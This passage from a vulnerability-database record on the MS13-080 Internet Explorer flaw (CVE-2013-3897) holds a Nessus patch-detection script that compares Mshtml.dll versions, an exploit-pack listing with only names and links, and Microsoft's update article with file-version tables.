2012, 8.1, and 2012 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-080';\nkb = '2879017';\n\nkbs = make_list(kb, '2884101');\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / 2012 R2\n #\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", file:\"Mshtml.dll\", version:\"11.0.9600.16412\", min_version:\"11.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:'2884101') ||\n # Windows 8 / 2012\n #\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", file:\"Mshtml.dll\", version:\"10.0.9200.20831\", min_version:\"10.0.9200.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.2\", file:\"Mshtml.dll\", version:\"10.0.9200.16721\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 7 / 2008 R2\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", arch:\"x86\", sp:1, file:\"Mshtml.dll\", version:\"11.0.9600.16411\", min_version:\"11.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", arch:\"x64\", sp:1, file:\"Mshtml.dll\", version:\"11.0.9600.16410\", min_version:\"11.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"10.0.9200.20831\", min_version:\"10.0.9200.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"10.0.9200.16721\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"9.0.8112.20625\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"9.0.8112.16514\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22464\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18269\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.20625\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.16514\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23532\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19475\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.23226\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18945\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23532\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21357\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5226\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23532\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21357\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6452\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T19:48:26", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3897"], "edition": 2, "description": "**Name**| ie_cdisplaypointer \n---|--- \n**CVE**| CVE-2013-3897 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ie_cdisplaypointer \n**Notes**| CVE Name: CVE-2013-3897 \nVENDOR: Microsoft \nNotes: \n \nVersionsAffected: 8 \nRepeatability: Infinite \nReferences: ['http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx'] \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3897 \nMSADV: MS13-080 \n\n", "modified": "2013-10-09T14:54:00", "published": "2013-10-09T14:54:00", "id": "IE_CDISPLAYPOINTER", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ie_cdisplaypointer", "type": "canvas", "title": "Immunity Canvas: IE_CDISPLAYPOINTER", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:39:18", "bulletinFamily": "microsoft", "cvelist": ["CVE-2013-3882", "CVE-2013-3873", "CVE-2013-3875", "CVE-2013-3874", "CVE-2013-3885", "CVE-2013-3893", "CVE-2013-3897", "CVE-2013-3886", "CVE-2013-3872"], "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage by using Internet Explorer.</p><h2></h2><div class=\"kb-notice-section section\">The update that this article describes has been replaced by a newer update. We recommend that you install the most current cumulative security update for Internet Explorer. To install the most current update, visit the following Microsoft website:<br/><br/> <br/><br/><div class=\"indent\"><a href=\"http://windowsupdate.microsoft.com\" id=\"kb-link-1\" target=\"_self\">http://windowsupdate.microsoft.com</a></div>For more technical information about the most current cumulative security update for Internet Explorer, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin\" id=\"kb-link-2\" target=\"_self\">http://technet.microsoft.com/security/bulletin</a></div></div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS13-080. Learn more about how to obtain the fixes that are included in this security bulletin: <ul class=\"sbody-free_list\"><li>For individual, small business, and organizational users, use the Windows automatic updating feature to install the fixes from Microsoft Update. To do this, see <a href=\"http://www.microsoft.com/security/pc-security/updates.aspx\" id=\"kb-link-3\" target=\"_self\">Get security updates automatically</a> on the Microsoft Safety and Security Center website.</li><li>For IT professionals, see <a href=\"http://technet.microsoft.com/security/bulletin/ms13-080\" id=\"kb-link-4\" target=\"_self\">Microsoft Security Bulletin\u00a0MS13-080</a> on the Security TechCenter website.</li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates:<br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-5\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals:<br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-6\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-7\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country:<br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-8\" target=\"_self\">International Support</a><br/><br/></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\">If you are running Internet Explorer 11 in Windows 8.1 and Windows Server 2012 R2, you should install security update 2884101. For more information, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2884101\" id=\"kb-link-9\">2884101 </a> MS13-080: Description of the security update for Internet Explorer 11 in Windows 8.1 and Windows Server 2012 R2: October 8, 2013</div></div><h2>Fix it for me</h2><div class=\"kb-resolution-section section\"><span class=\"text-base\">Notes about this Fix it solution</span><ul class=\"sbody-free_list\"><li>This Fix it solution addresses the issue that was previously described in <a href=\"http://technet.microsoft.com/security/advisory/2887505\" id=\"kb-link-10\" target=\"_self\">Microsoft Security Advisory (2887505): Vulnerability in Internet Explorer could allow remote code execution</a> We are providing this Fix it solution as workaround if you are not able to apply security update 2879017. </li><li>You must restart Internet Explorer after you apply this Fix it solution. </li><li>The Fix it solution that is described in this section applies only 32-bit versions of Internet Explorer. </li><li>You must have security update 2870699 installed for this Fix it to provide effective protection against this issue. For more information about security update 2870699, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2870699\" id=\"kb-link-11\">2870699 </a> MS13-069: Cumulative security update for Internet Explorer: September 10, 2013</div></li><li>This Fix it solution is not intended to be a replacement for any security update. We recommend that you always install the latest security updates. However, we offer this Fix it solution as a workaround option for some scenarios. <br/><br/>For more information about this workaround, go to the following Microsoft Security Bulletin webpage:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms13-080 \" id=\"kb-link-12\" target=\"_self\">http://technet.microsoft.com/security/bulletin/ms13-080</a></div> The bulletin provides more information about the issue. This includes the following:<br/><ul class=\"sbody-free_list\"><li>The scenarios in which you might apply or disable the workaround. </li></ul>Specifically, to see this information, look for the <strong class=\"uiterm\">General Information</strong> heading, expand the <strong class=\"uiterm\">Suggested actions</strong> section, and then expand the <strong class=\"uiterm\">Workaround</strong> section. </li><li>These wizards may be in English only. However, the automatic fixes also work for other language versions of Windows. </li><li>If you are not on the computer that has the problem, you can save the automatic fix to a flash drive or a CD and then run the fix on the computer that has the problem. </li></ul>To enable or disable this Fix it solution, click the <strong class=\"uiterm\">Fix it</strong> button or link under the <strong class=\"uiterm\">Enable</strong> heading or under the <strong class=\"uiterm\">Disable</strong> heading. Click <strong class=\"uiterm\">Run</strong> in the <strong class=\"uiterm\">File Download</strong> dialog box, and then follow the steps in the Fix it wizard. <br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Enable CVE-2013-3893 MSHTML Shim Workaround</th><th class=\"sbody-th\">Disable CVE-2013-3893 MSHTML Shim Workaround</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span><div caption=\"Fix this problem \" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9838025\" text=\"Download\"></div></span></td><td class=\"sbody-td\"><span><div caption=\"Fix this problem \" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9838026\" text=\"Download\"></div></span></td></tr></table></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Non-security-related fixes that are included in this security update</h3><h4 class=\"sbody-h4\">General distribution release (GDR) fixes</h4>Individual updates may not be installed, depending on the version of Windows and the version of the affected application. You can view the individual articles to determine your update status.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Article number</th><th class=\"sbody-th\">Article title</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2889289\" id=\"kb-link-13\">2889289 </a></td><td class=\"sbody-td\">Memory leak when you access a web page that uses the \"navigator.geolocation\" object in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2893031\" id=\"kb-link-14\">2893031 </a></td><td class=\"sbody-td\">Proxy setting of a VPN client that do not support IPv6 is not used in Internet Explorer 10</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2893030\" id=\"kb-link-15\">2893030 </a></td><td class=\"sbody-td\">Backspace, delete and tab keys do not work in the text box of an Explorer bar in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2893028\" id=\"kb-link-16\">2893028 </a></td><td class=\"sbody-td\">You cannot add an item to Favorites bar in Internet Explorer 10 when Windows 8 has EPM and folder redirection enabled </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2893027\" id=\"kb-link-17\">2893027 </a></td><td class=\"sbody-td\">Certain Images are not printed or displayed in print preview output in Internet Explorer 10</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2893026\" id=\"kb-link-18\">2893026 </a></td><td class=\"sbody-td\">Data loss occurs when you open an Office file in Internet Explorer 10</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2880217\" id=\"kb-link-19\">2880217 </a></td><td class=\"sbody-td\">A fault in Mshtml.dll may occur in an application that hosts the Internet Explorer 8 or Internet Explorer 9 WebBrowser control </td></tr></table></div><h4 class=\"sbody-h4\">Hotfixes</h4>Security update 2879017 packages for Windows XP and Windows Server 2003 include Internet Explorer hotfix files and general distribution release (GDR) files. If no existing Internet Explorer files are from the hotfix environment, security update 2879017 installs the GDR files. <br/><br/>Hotfixes are intended to correct only the problems that are described in the Microsoft Knowledge Base articles that are associated with the hotfixes. Apply hotfixes only to systems that are experiencing these specific problems. <br/><br/>These hotfixes may receive additional testing. Therefore, if you are not severely affected by this problem, we recommend that you wait for the next service pack that contains these hotfixes. <span>For more information about how to install the hotfixes that are included in security update 2879017, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/897225\" id=\"kb-link-20\">897225 </a>How to install hotfixes that are included in cumulative security updates for Internet Explorer </div></span><br/><span class=\"text-base\">Note</span> In addition to installing hotfix files, you should review the Microsoft Knowledge Base article that is associated with the specific hotfix that you have to install to determine the registry modification that is required to enable that specific hotfix. <br/><br/><span>For more information about how to determine whether your existing Internet Explorer files are from the hotfix or from the GDR environment, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/824994\" id=\"kb-link-21\">824994 </a>Description of the contents of Windows XP Service Pack 2 and Windows Server 2003 software update packages </div></span></div><h2>FILE INFORMATION</h2><div class=\"kb-summary-section section\"><a class=\"bookmark\" id=\"fileinfo\"></a>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). Be aware that dates and times for these files on your local computer are displayed in your local time and with your current daylight saving time bias. The dates and times may also change when you perform certain operations on the files.<br/><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Windows XP and Windows Server 2003 file information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li>The files that apply to a specific milestone (SP<strong class=\"sbody-strong\">n</strong>) and service branch (QFE, GDR) are noted in the \"SP requirement\" and \"Service branch\" columns. </li><li>GDR service branches contain only fixes that are widely released to address widespread, critical issues. QFE service branches contain hotfixes in addition to widely released fixes. </li><li> In addition to the files that are listed in these tables, this software update also installs an associated security catalog file (KB<strong class=\"sbody-strong\">number</strong>.cat) that is signed with a Microsoft digital signature. </li></ul><h3 class=\"sbody-h3\">Internet Explorer 6</h3><h4 class=\"sbody-h4\">Internet Explorer 6 on all supported 32-bit versions of Windows XP</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Browseui.dll</td><td class=\"sbody-td\">6.0.2900.6452</td><td class=\"sbody-td\">1,025,024</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">369,664</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">01:22</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">81,920</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">6.0.2900.6452</td><td class=\"sbody-td\">251,904</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">20:10</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">6.0.2900.6452</td><td class=\"sbody-td\">3,093,504</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">6.0.2900.6452</td><td class=\"sbody-td\">449,536</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">6.0.2900.6452</td><td class=\"sbody-td\">532,480</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Shdocvw.dll</td><td class=\"sbody-td\">6.0.2900.6452</td><td class=\"sbody-td\">1,510,400</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Tdc.ocx</td><td class=\"sbody-td\">1.3.0.3131</td><td class=\"sbody-td\">61,952</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">6.0.2900.6452</td><td class=\"sbody-td\">37,888</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">6.0.2900.6452</td><td class=\"sbody-td\">633,856</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">6.0.2900.6452</td><td class=\"sbody-td\">852,992</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">6.0.2900.6452</td><td class=\"sbody-td\">668,672</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 6 on all supported 32-bit versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Browseui.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,033,728</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">6.3.3790.5226</td><td class=\"sbody-td\">361,472</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">6.3.3790.5226</td><td class=\"sbody-td\">209,920</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">369,664</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">08:33</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">82,432</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">253,952</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">3,163,136</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">459,264</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">537,600</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">5.2.3790.5226</td><td class=\"sbody-td\">42,496</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Shdocvw.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,520,128</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Tdc.ocx</td><td class=\"sbody-td\">1.3.0.3131</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td 